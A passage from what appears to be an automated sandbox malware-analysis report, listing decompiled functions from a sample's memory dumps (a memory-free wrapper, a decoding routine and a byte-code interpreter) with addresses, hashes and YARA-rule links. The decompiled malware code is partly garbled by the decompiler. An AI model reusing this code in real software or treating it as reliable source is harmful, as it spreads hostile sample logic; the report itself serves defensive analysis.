                                                                    • Associated: 00000000.00000002.322884038.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.322913999.0000000000402000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.322924635.0000000000403000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.322942646.0000000000404000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: a20277a400fb642be710d4869ec2bcd9b4db83fc23c0e093b7f6ca33a819f6e2
                                                                    • Instruction ID: e052ad54e148c9824dea0ff193791d118479de1e911c6314483e4476b70d5c08
                                                                    • Opcode Fuzzy Hash: a20277a400fb642be710d4869ec2bcd9b4db83fc23c0e093b7f6ca33a819f6e2
                                                                    • Instruction Fuzzy Hash: 31B012B13843007BF110D7408F0AF1B7758A754F01F104010B304A90C0C2F06800C62D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401C40, Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00401C40(void* _a4) {
				int _t3;

				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}




                                                                    0x00401c4c
                                                                    0x00401c52

                                                                    APIs
                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,0040153E,?,?,004014AE,00000000), ref: 00401C4C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.322893653.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.322884038.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.322913999.0000000000402000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.322924635.0000000000403000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.322942646.0000000000404000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 1263568516-0
                                                                    • Opcode ID: 3452eea8fc26a77c091418c712361d3ad82bdca17a95aecdddbe1dfae72c4888
                                                                    • Instruction ID: 077609c2f21f1435d8c09927994ad9a076a1c16938dec3d85cfe3e8101f243b7
                                                                    • Opcode Fuzzy Hash: 3452eea8fc26a77c091418c712361d3ad82bdca17a95aecdddbe1dfae72c4888
                                                                    • Instruction Fuzzy Hash: 48B012B174030077D510DB508F0DF0773546750B00F1084107344A50C0C6B4B404CB1C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 10007770, Relevance: 1.6, Strings: 1, Instructions: 323COMMONCrypto
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 84%
                                                                    			E10007770(void* __eflags) {
				signed int _t137;
				intOrPtr* _t138;
				signed int _t140;
				signed int _t141;
				void* _t150;
				signed int _t170;
				short _t177;
				short _t180;
				signed int _t181;
				signed int _t183;
				intOrPtr _t190;
				intOrPtr _t202;
				void* _t223;
				void* _t228;
				intOrPtr _t229;
				signed int _t230;
				void* _t231;
				void* _t236;
				void* _t241;
				void* _t243;
				void* _t245;

				_t229 =  *((intOrPtr*)(_t245 + 0x24));
				 *((intOrPtr*)(_t245 + 0x10)) =  *( *(_t245 + 0x14));
				_push(_t245 + 0x18);
				 *((intOrPtr*)(_t245 + 0x2c)) = 0x36;
				 *0x1000d2b0 = _t229;
				_t228 = E10007680(__eflags, _t245 + 0x18, _t245 + 0x18, _t245 + 0x18);
				_t137 = E10006E90(_t245 + 0x10);
				 *(_t228 + 0x2c) = _t137;
				if(_t137 == 0) {
					L8:
					_t138 =  *((intOrPtr*)(_t245 + 0x10));
					if(_t138 <  *((intOrPtr*)(_t245 + 0x18)) || _t229 == 0) {
						_t140 =  *(_t245 + 0x14) + 4 - ( *(_t245 + 0x14) & 0x00000003);
						 *(_t245 + 0x14) = _t140;
						 *(_t228 + 0x20) = _t140;
						if(_t229 != 0) {
							_t138 =  *((intOrPtr*)(_t245 + 0x10));
							goto L40;
						}
						_t230 =  *(_t245 + 0x14);
						_t258 =  *((intOrPtr*)(_t245 + 0x10)) -  *((intOrPtr*)(_t245 + 0x18));
						if( *((intOrPtr*)(_t245 + 0x10)) >=  *((intOrPtr*)(_t245 + 0x18))) {
							L36:
							if( *((intOrPtr*)(_t230 - 4)) != 0x5c) {
								 *_t230 = 0x5c;
								_t230 = _t230 + 4;
							}
							 *(_t245 + 0x14) = _t230;
							goto L42;
						}
						do {
							_t150 = E10006EF0(_t258, _t245 + 0x10);
							 *_t230 = _t150;
							_t230 = _t230 + 4;
							if(_t150 >= 0x12 && _t150 < 0xec) {
								_t74 = _t150 - 0x19; // -25
								if(_t74 > 0x44) {
									L30:
									__eflags = 0xfffffffffffffffd - 8;
									if(0xfffffffffffffffd > 8) {
										goto L35;
									}
									switch( *((intOrPtr*)(0xfffffffffffffff4 +  &M10007BBC))) {
										case 0:
											L33:
											_t156 = E10006E90(_t245 + 0x10);
											L34:
											 *_t234 = _t156;
											_t230 = _t234 + 4;
											__eflags = _t230;
											goto L35;
										case 1:
											goto L35;
										case 2:
											 *_t230 = E10006E90(_t245 + 0x10);
											_t234 = _t230 + 4;
											__eflags = _t234;
											goto L33;
									}
								}
								switch( *((intOrPtr*)(0 +  &M10007B4C))) {
									case 0:
										 *(__esi - 4) = __ebp;
										 *__esi = 0;
										__eax =  *(__esp + 0x10);
										__esi = __esi + __ebx;
										__eax =  *(__esp + 0x10) + 1;
										 *(__esp + 0x10) =  *(__esp + 0x10) + 1;
										goto L35;
									case 1:
										 *(__esi - 4) = __ebp;
										__eax = 0;
										 *__esi = 0;
										__eax =  *(__esp + 0x10);
										__esi = __esi + __ebx;
										__eax =  *(__esp + 0x10) + 2;
										 *(__esp + 0x10) =  *(__esp + 0x10) + 2;
										goto L35;
									case 2:
										L18:
										 *_t235 =  *((intOrPtr*)( *((intOrPtr*)(_t245 + 0x10))));
										_t230 = _t235 + 4;
										 *((intOrPtr*)(_t245 + 0x10)) =  *((intOrPtr*)(_t245 + 0x10)) + 4;
										goto L35;
									case 3:
										__eax = E10006EF0(__eflags, __esp + 0x10);
										goto L34;
									case 4:
										E10006E90(__esp + 0x10) = __eax +  *0x1000d2bc;
										goto L34;
									case 5:
										 *_t230 =  *((intOrPtr*)( *((intOrPtr*)(_t245 + 0x10))));
										_t235 = _t230 + 4;
										 *((intOrPtr*)(_t245 + 0x10)) =  *((intOrPtr*)(_t245 + 0x10)) + 4;
										goto L18;
									case 6:
										__eax = E10006E90(__esp + 0x10);
										 *__esi = __eax;
										__esi = __esi + __ebx;
										__eflags = __eax;
										if(__eflags <= 0) {
											goto L35;
										}
										__ebx = __eax;
										do {
											__eax = __esp + 0x10;
											 *__esi = E10006F10(__esp + 0x10);
											__esi =  &(__esi[1]);
											__ebx = __ebx - 1;
											__eflags = __ebx;
										} while (__eflags != 0);
										goto L35;
									case 7:
										__eax = __esp + 0x10;
										__ebx = E10006E90(__esp + 0x10);
										 *__esi = __ebx;
										__esi =  &(__esi[1]);
										E10003AA0(__esi,  *(__esp + 0x10), __ebx) = __ebx;
										__eax = __ebx & 0x00000003;
										__esi =  &(__esi[(0 | __eflags != 0x00000000) + (__ebx >> 2)]);
										__eflags = __ebx & 0x00000003;
										 *(__esp + 0x10) =  *(__esp + 0x10) + __ebx;
										if(__eflags != 0) {
											__eax = E10003E70(__esi - 4, 4 - __eax);
										}
										goto L35;
									case 8:
										__ebx = E10006E90(__esp + 0x10);
										 *__esi = __ebx;
										__ebx = __ebx << 2;
										__esi =  &(__esi[1]);
										E10003AA0(__esi,  *(__esp + 0x10), __ebx) =  *(__esi - 4);
										__esi =  &(__esi[ *(__esi - 4)]);
										 *(__esp + 0x10) =  *(__esp + 0x10) + __ebx;
										 *(__esp + 0x10) =  *(__esp + 0x10) + __ebx;
										goto L35;
									case 9:
										goto L30;
								}
							}
							L35:
						} while ( *((intOrPtr*)(_t245 + 0x10)) <  *((intOrPtr*)(_t245 + 0x18)));
						goto L36;
					} else {
						L40:
						_t230 =  *(_t245 + 0x14);
						__eflags = _t138 -  *((intOrPtr*)(_t245 + 0x18));
						if(_t138 >=  *((intOrPtr*)(_t245 + 0x18))) {
							L42:
							_t141 =  *(_t228 + 0x20);
							if(_t141 != 0) {
								 *((intOrPtr*)(_t228 + 0x32)) = _t230 - _t141;
							}
							_t231 = E10006F50(0);
							if(_t231 == _t228) {
								E100068C0( *(_t245 + 0x14));
							}
							if( *((intOrPtr*)(_t245 + 0x28)) == 0) {
								_t190 =  *0x1000d2a8; // 0xf
								 *((intOrPtr*)( *((intOrPtr*)(_t245 + 0x24)))) =  *((intOrPtr*)( *((intOrPtr*)(_t245 + 0x24)))) + _t190;
							}
							return _t231;
						} else {
							goto L41;
						}
						do {
							L41:
							 *_t230 =  *_t138;
							_t230 =  *(_t245 + 0x14) + 1;
							_t138 =  *((intOrPtr*)(_t245 + 0x10)) + 1;
							__eflags = _t138 -  *((intOrPtr*)(_t245 + 0x18));
							 *(_t245 + 0x14) = _t230;
							 *((intOrPtr*)(_t245 + 0x10)) = _t138;
						} while (_t138 <  *((intOrPtr*)(_t245 + 0x18)));
						goto L42;
					}
				}
				 *(_t228 + 0x2e) =  *(_t245 + 0x14);
				_t243 = 0;
				_t180 = 0;
				 *(_t245 + 0x14) =  *(_t245 + 0x14) + ((_t137 & 0x0000ffff) + (_t137 & 0x0000ffff) * 2) * 4;
				if( *(_t228 + 0x2c) <= 0) {
					L4:
					_push(1);
					_push(_t245 + 0x1c);
					_push(_t180);
					_push(_t245 + 0x1c);
					_push(_t245 + 0x1c);
					 *((intOrPtr*)(_t228 + 0x24)) = E100072D0();
					_t202 = 0;
					_t181 = 0;
					 *(_t228 + 0x28) =  *(_t245 + 0x1c) >> 2;
					if(0xffffffffffffffff == 0) {
						L7:
						_t229 =  *((intOrPtr*)(_t245 + 0x28));
						_t183 = _t181 + _t181 * 2 << 2;
						 *((intOrPtr*)( *(_t228 + 0x2e) + _t183 + 4)) =  *(_t228 + 0x28) - _t202;
						 *((intOrPtr*)( *(_t228 + 0x2e) + _t183 + 8)) = _t202;
						goto L8;
					}
					_t170 =  *(_t228 + 0x2e);
					_t223 = 0;
					do {
						 *((intOrPtr*)(_t223 + _t170 + 8)) = _t202;
						_t236 = _t223 +  *(_t228 + 0x2e);
						_t223 = _t223 + 0xc;
						 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t228 + 0x24)) + 4)) - _t202;
						_t170 =  *(_t228 + 0x2e);
						_t202 = _t202 +  *((intOrPtr*)(_t223 + _t170 - 8));
						_t181 = _t181 + 1;
					} while (_t181 < 0xffffffffffffffff);
					goto L7;
				}
				_t241 = 0;
				do {
					_t177 = E10006E90(_t245 + 0x10);
					_t241 = _t241 + 0xc;
					 *((short*)(_t241 +  *(_t228 + 0x2e) - 0xc)) = _t177;
					 *((short*)(_t241 +  *(_t228 + 0x2e) - 0xa)) = _t180;
					_t180 = _t180;
					_t243 = _t243 + 1;
				} while (_t243 < 0);
				goto L4;
			}
























                                                                    0x1000777c
                                                                    0x10007785
                                                                    0x1000778d
                                                                    0x10007799
                                                                    0x100077a1
                                                                    0x100077ac
                                                                    0x100077b3
                                                                    0x100077bb
                                                                    0x100077bf
                                                                    0x100078a9
                                                                    0x100078a9
                                                                    0x100078b3
                                                                    0x100078cd
                                                                    0x100078cf
                                                                    0x100078d3
                                                                    0x100078d8
                                                                    0x10007adb
                                                                    0x00000000
                                                                    0x10007adb
                                                                    0x100078e6
                                                                    0x100078ea
                                                                    0x100078ec
                                                                    0x10007ac6
                                                                    0x10007aca
                                                                    0x10007acc
                                                                    0x10007ad2
                                                                    0x10007ad2
                                                                    0x10007ad5
                                                                    0x00000000
                                                                    0x10007ad5
                                                                    0x100078f7
                                                                    0x100078fc
                                                                    0x10007906
                                                                    0x10007908
                                                                    0x1000790d
                                                                    0x1000791e
                                                                    0x10007924
                                                                    0x10007a81
                                                                    0x10007a8e
                                                                    0x10007a91
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10007a93
                                                                    0x00000000
                                                                    0x10007aa8
                                                                    0x10007aad
                                                                    0x10007ab2
                                                                    0x10007ab2
                                                                    0x10007ab4
                                                                    0x10007ab4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10007aa4
                                                                    0x10007aa6
                                                                    0x10007aa6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10007a93
                                                                    0x10007932
                                                                    0x00000000
                                                                    0x10007966
                                                                    0x10007971
                                                                    0x10007973
                                                                    0x10007977
                                                                    0x10007979
                                                                    0x1000797a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10007983
                                                                    0x1000798a
                                                                    0x1000798f
                                                                    0x10007991
                                                                    0x10007995
                                                                    0x10007997
                                                                    0x1000799a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000794d
                                                                    0x10007953
                                                                    0x10007959
                                                                    0x1000795d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10007a21
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10007a11
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000793f
                                                                    0x10007945
                                                                    0x10007949
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100079a8
                                                                    0x100079ad
                                                                    0x100079af
                                                                    0x100079b1
                                                                    0x100079b3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100079b9
                                                                    0x100079bb
                                                                    0x100079bb
                                                                    0x100079c5
                                                                    0x100079c7
                                                                    0x100079ca
                                                                    0x100079ca
                                                                    0x100079ca
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10007a2b
                                                                    0x10007a35
                                                                    0x10007a37
                                                                    0x10007a3d
                                                                    0x10007a48
                                                                    0x10007a4f
                                                                    0x10007a5c
                                                                    0x10007a65
                                                                    0x10007a67
                                                                    0x10007a6b
                                                                    0x10007a7a
                                                                    0x10007a7a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100079dc
                                                                    0x100079de
                                                                    0x100079e4
                                                                    0x100079e7
                                                                    0x100079f2
                                                                    0x100079f5
                                                                    0x100079fc
                                                                    0x100079fe
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10007932
                                                                    0x10007ab6
                                                                    0x10007abe
                                                                    0x00000000
                                                                    0x10007adf
                                                                    0x10007adf
                                                                    0x10007ae3
                                                                    0x10007ae7
                                                                    0x10007ae9
                                                                    0x10007b09
                                                                    0x10007b09
                                                                    0x10007b0e
                                                                    0x10007b12
                                                                    0x10007b12
                                                                    0x10007b1c
                                                                    0x10007b20
                                                                    0x10007b27
                                                                    0x10007b27
                                                                    0x10007b32
                                                                    0x10007b38
                                                                    0x10007b3e
                                                                    0x10007b3e
                                                                    0x10007b49
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10007aeb
                                                                    0x10007aeb
                                                                    0x10007aed
                                                                    0x10007afb
                                                                    0x10007afc
                                                                    0x10007afd
                                                                    0x10007aff
                                                                    0x10007b03
                                                                    0x10007b03
                                                                    0x00000000
                                                                    0x10007aeb
                                                                    0x100078b3
                                                                    0x100077ce
                                                                    0x100077d1
                                                                    0x100077da
                                                                    0x100077df
                                                                    0x100077e7
                                                                    0x1000781f
                                                                    0x10007823
                                                                    0x10007825
                                                                    0x1000782a
                                                                    0x1000782f
                                                                    0x10007830
                                                                    0x10007836
                                                                    0x10007846
                                                                    0x10007848
                                                                    0x1000784b
                                                                    0x1000784e
                                                                    0x1000788c
                                                                    0x10007895
                                                                    0x10007899
                                                                    0x1000789e
                                                                    0x100078a5
                                                                    0x00000000
                                                                    0x100078a5
                                                                    0x10007850
                                                                    0x10007853
                                                                    0x10007855
                                                                    0x10007855
                                                                    0x1000785f
                                                                    0x10007864
                                                                    0x10007874
                                                                    0x10007877
                                                                    0x1000787e
                                                                    0x10007886
                                                                    0x10007888
                                                                    0x00000000
                                                                    0x10007855
                                                                    0x100077e9
                                                                    0x100077eb
                                                                    0x100077f0
                                                                    0x100077f8
                                                                    0x100077fb
                                                                    0x10007805
                                                                    0x10007818
                                                                    0x1000781a
                                                                    0x1000781b
                                                                    0x00000000

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.327962858.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.327957654.0000000010000000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327972112.000000001000A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327977394.000000001000C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6
                                                                    • API String ID: 0-498629140
                                                                    • Opcode ID: c38a232ed20ba8e24907c670369c1595ba032e8a13388d9657823522de41902a
                                                                    • Instruction ID: 1b3f4af497888b53fd365281aeb5f2a41ec7bc63058a9c565f656c0d3baf4bf9
                                                                    • Opcode Fuzzy Hash: c38a232ed20ba8e24907c670369c1595ba032e8a13388d9657823522de41902a
                                                                    • Instruction Fuzzy Hash: F5C15975A047429FD314CF68C88095AB7E5FF88380F154E2DE999C7749E734E909CBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 10001E10, Relevance: .3, Instructions: 254COMMONCrypto
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 97%
                                                                    			E10001E10(intOrPtr _a4) {
				intOrPtr _t56;
				signed int _t59;
				signed char* _t60;
				intOrPtr _t65;

				_t56 = _a4;
				_t65 =  *((intOrPtr*)(_t56 + 8));
				_t60 =  *(_t65 - 4);
				_t59 =  *((intOrPtr*)( *((intOrPtr*)(_t56 + 4)))) + 0xffffff31;
				if(_t59 > 0x1b) {
					return _t59;
				} else {
					switch( *((intOrPtr*)(_t59 * 4 +  &M1000205C))) {
						case 0:
							_t64 =  *_t60 + 1;
							 *_t60 = _t64;
							 *(_t65 - 4) = _t64 & 0x000000ff;
							return _t59;
							goto L31;
						case 1:
							__dl =  *__ecx;
							 *(__edi - 4) = 0;
							 *__ecx =  *__ecx + 1;
							 *__ecx =  *__ecx + 1;
							return __eax;
							goto L31;
						case 2:
							__dl =  *__ecx;
							__dl =  *__ecx - 1;
							 *__ecx = __dl;
							__cl = __dl;
							 *(__edi - 4) = __ecx;
							return __eax;
							goto L31;
						case 3:
							__eax = 0;
							__al =  *__ecx;
							 *(__edi - 4) = 0;
							 *__ecx =  *__ecx - 1;
							 *__ecx =  *__ecx - 1;
							return 0;
							goto L31;
						case 4:
							__al =  *__esi;
							__al =  *__esi + __cl;
							__ecx = 0;
							__cl = __al;
							 *__esi = __al;
							 *((intOrPtr*)(__edi - 8)) = 0;
							return __eax;
							goto L31;
						case 5:
							__al =  *__esi;
							__al =  *__esi - __cl;
							__ecx = 0;
							__cl = __al;
							 *__esi = __al;
							 *((intOrPtr*)(__edi - 8)) = 0;
							return __eax;
							goto L31;
						case 6:
							__al =  *__esi;
							__eax = __eax * __cl;
							__ecx = 0;
							 *__esi = __al;
							__cl = __al;
							 *((intOrPtr*)(__edi - 8)) = 0;
							return __eax;
							goto L31;
						case 7:
							__eax = 0;
							__ecx = __ecx & 0x000000ff;
							__al =  *__esi;
							asm("cdq");
							__eax = 0 / __ecx;
							__ecx = 0;
							__cl = __al;
							 *__esi = __al;
							 *((intOrPtr*)(__edi - 8)) = 0;
							return __eax;
							goto L31;
						case 8:
							__eax = 0;
							__ecx = __ecx & 0x000000ff;
							__al =  *__esi;
							asm("cdq");
							__eax = 0 / __ecx;
							__ecx = 0;
							__cl = __dl;
							 *__esi = __dl;
							 *((intOrPtr*)(__edi - 8)) = 0;
							return __eax;
							goto L31;
						case 9:
							__al =  *__esi;
							__al =  *__esi & __cl;
							__ecx = 0;
							__cl = __al;
							 *__esi = __al;
							 *((intOrPtr*)(__edi - 8)) = 0;
							return __eax;
							goto L31;
						case 0xa:
							__al =  *__esi;
							__al =  *__esi | __cl;
							__ecx = 0;
							__cl = __al;
							 *__esi = __al;
							 *((intOrPtr*)(__edi - 8)) = 0;
							return __eax;
							goto L31;
						case 0xb:
							__al =  *__esi;
							__al =  *__esi ^ __cl;
							__ecx = 0;
							__cl = __al;
							 *__esi = __al;
							 *((intOrPtr*)(__edi - 8)) = 0;
							return __eax;
							goto L31;
						case 0xc:
							__al =  *__esi;
							__al =  *__esi << __cl;
							__ecx = 0;
							__cl = __al;
							 *__esi = __al;
							 *((intOrPtr*)(__edi - 8)) = 0;
							return __eax;
							goto L31;
						case 0xd:
							__al =  *__esi;
							__al =  *__esi >> __cl;
							__ecx = 0;
							__cl = __al;
							 *__esi = __al;
							 *((intOrPtr*)(__edi - 8)) = 0;
							return __eax;
							goto L31;
						case 0xe:
							 *__ecx =  *__ecx + 1;
							__cx =  *__ecx;
							 *(__edi - 4) = __ecx;
							return __eax;
							goto L31;
						case 0xf:
							__dx =  *__ecx;
							 *(__edi - 4) = 0;
							 *__ecx =  *__ecx + 1;
							return __eax;
							goto L31;
						case 0x10:
							 *__ecx =  *__ecx - 1;
							__cx =  *__ecx;
							 *(__edi - 4) = __ecx;
							return __eax;
							goto L31;
						case 0x11:
							__eax = 0;
							 *(__edi - 4) = 0;
							 *__ecx =  *__ecx - 1;
							return 0;
							goto L31;
						case 0x12:
							 *__esi =  *__esi + __cx;
							__eax = 0;
							 *((intOrPtr*)(__edi - 8)) = 0;
							return 0;
							goto L31;
						case 0x13:
							 *__esi =  *__esi - __cx;
							__eax = 0;
							 *((intOrPtr*)(__edi - 8)) = 0;
							return 0;
							goto L31;
						case 0x14:
							 *__esi =  *__esi * __cx;
							__eax = 0;
							 *__esi =  *__esi * __cx;
							 *((intOrPtr*)(__edi - 8)) = 0;
							return 0;
							goto L31;
						case 0x15:
							__eax = 0;
							__ecx = __ecx & 0x0000ffff;
							asm("cdq");
							__eax = 0 / __ecx;
							__eax = 0;
							 *((intOrPtr*)(__edi - 8)) = 0;
							return 0;
							goto L31;
						case 0x16:
							__eax = 0;
							__ecx = __ecx & 0x0000ffff;
							asm("cdq");
							0 / __ecx = 0;
							 *__esi = __dx;
							 *((intOrPtr*)(__edi - 8)) = 0;
							return 0;
							goto L31;
						case 0x17:
							 *__esi =  *__esi & __cx;
							__eax = 0;
							 *((intOrPtr*)(__edi - 8)) = 0;
							return 0;
							goto L31;
						case 0x18:
							 *__esi =  *__esi | __cx;
							__eax = 0;
							 *((intOrPtr*)(__edi - 8)) = 0;
							return 0;
							goto L31;
						case 0x19:
							 *__esi =  *__esi ^ __cx;
							__eax = 0;
							 *((intOrPtr*)(__edi - 8)) = 0;
							return 0;
							goto L31;
						case 0x1a:
							 *__esi =  *__esi << __cl;
							__eax = 0;
							 *((intOrPtr*)(__edi - 8)) = 0;
							return 0;
							goto L31;
						case 0x1b:
							 *__esi =  *__esi >> __cl;
							__eax = 0;
							 *((intOrPtr*)(__edi - 8)) = 0;
							return 0;
					}
				}
				L31:
			}







                                                                    0x10001e10
                                                                    0x10001e16
                                                                    0x10001e1e
                                                                    0x10001e24
                                                                    0x10001e2c
                                                                    0x10002057
                                                                    0x10001e32
                                                                    0x10001e32
                                                                    0x00000000
                                                                    0x10001e3b
                                                                    0x10001e3d
                                                                    0x10001e47
                                                                    0x10001e4c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001e51
                                                                    0x10001e53
                                                                    0x10001e58
                                                                    0x10001e5b
                                                                    0x10001e5e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001e61
                                                                    0x10001e63
                                                                    0x10001e65
                                                                    0x10001e67
                                                                    0x10001e6f
                                                                    0x10001e74
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001e77
                                                                    0x10001e79
                                                                    0x10001e7b
                                                                    0x10001e80
                                                                    0x10001e83
                                                                    0x10001e86
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001e89
                                                                    0x10001e8b
                                                                    0x10001e8d
                                                                    0x10001e8f
                                                                    0x10001e91
                                                                    0x10001e93
                                                                    0x10001e98
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001e9b
                                                                    0x10001e9d
                                                                    0x10001e9f
                                                                    0x10001ea1
                                                                    0x10001ea3
                                                                    0x10001ea5
                                                                    0x10001eaa
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001ead
                                                                    0x10001eaf
                                                                    0x10001eb1
                                                                    0x10001eb3
                                                                    0x10001eb5
                                                                    0x10001eb7
                                                                    0x10001ebc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001ebf
                                                                    0x10001ec1
                                                                    0x10001ec7
                                                                    0x10001ec9
                                                                    0x10001eca
                                                                    0x10001ecc
                                                                    0x10001ece
                                                                    0x10001ed0
                                                                    0x10001ed2
                                                                    0x10001ed7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001eda
                                                                    0x10001edc
                                                                    0x10001ee2
                                                                    0x10001ee4
                                                                    0x10001ee5
                                                                    0x10001ee7
                                                                    0x10001ee9
                                                                    0x10001eeb
                                                                    0x10001eed
                                                                    0x10001ef2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001ef5
                                                                    0x10001ef7
                                                                    0x10001ef9
                                                                    0x10001efb
                                                                    0x10001efd
                                                                    0x10001eff
                                                                    0x10001f04
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001f07
                                                                    0x10001f09
                                                                    0x10001f0b
                                                                    0x10001f0d
                                                                    0x10001f0f
                                                                    0x10001f11
                                                                    0x10001f16
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001f19
                                                                    0x10001f1b
                                                                    0x10001f1d
                                                                    0x10001f1f
                                                                    0x10001f21
                                                                    0x10001f23
                                                                    0x10001f28
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001f2b
                                                                    0x10001f2d
                                                                    0x10001f2f
                                                                    0x10001f31
                                                                    0x10001f33
                                                                    0x10001f35
                                                                    0x10001f3a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001f3d
                                                                    0x10001f3f
                                                                    0x10001f41
                                                                    0x10001f43
                                                                    0x10001f45
                                                                    0x10001f47
                                                                    0x10001f4c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001f4f
                                                                    0x10001f52
                                                                    0x10001f5b
                                                                    0x10001f60
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001f65
                                                                    0x10001f68
                                                                    0x10001f6b
                                                                    0x10001f70
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001f73
                                                                    0x10001f76
                                                                    0x10001f7f
                                                                    0x10001f84
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001f87
                                                                    0x10001f8c
                                                                    0x10001f8f
                                                                    0x10001f94
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001f97
                                                                    0x10001f9a
                                                                    0x10001f9f
                                                                    0x10001fa4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001fa7
                                                                    0x10001faa
                                                                    0x10001faf
                                                                    0x10001fb4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001fba
                                                                    0x10001fbe
                                                                    0x10001fc0
                                                                    0x10001fc6
                                                                    0x10001fcb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001fce
                                                                    0x10001fd0
                                                                    0x10001fd9
                                                                    0x10001fda
                                                                    0x10001fdf
                                                                    0x10001fe4
                                                                    0x10001fe9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001fec
                                                                    0x10001fee
                                                                    0x10001ff7
                                                                    0x10001ffa
                                                                    0x10001fff
                                                                    0x10002002
                                                                    0x10002007
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000200a
                                                                    0x1000200d
                                                                    0x10002012
                                                                    0x10002017
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000201a
                                                                    0x1000201d
                                                                    0x10002022
                                                                    0x10002027
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000202a
                                                                    0x1000202d
                                                                    0x10002032
                                                                    0x10002037
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000203a
                                                                    0x1000203d
                                                                    0x10002042
                                                                    0x10002047
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000204a
                                                                    0x1000204d
                                                                    0x10002052
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001e32
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.327962858.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.327957654.0000000010000000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327972112.000000001000A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327977394.000000001000C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: aaefbdbe425c5aa7fb846bd34d1eb0f4a8a19ee6af318a2a42404b456b852010
                                                                    • Instruction ID: 082d9aa7fd4a7b989eb4da39068a55256bcff8a997aa6241da3f3cac159174e0
                                                                    • Opcode Fuzzy Hash: aaefbdbe425c5aa7fb846bd34d1eb0f4a8a19ee6af318a2a42404b456b852010
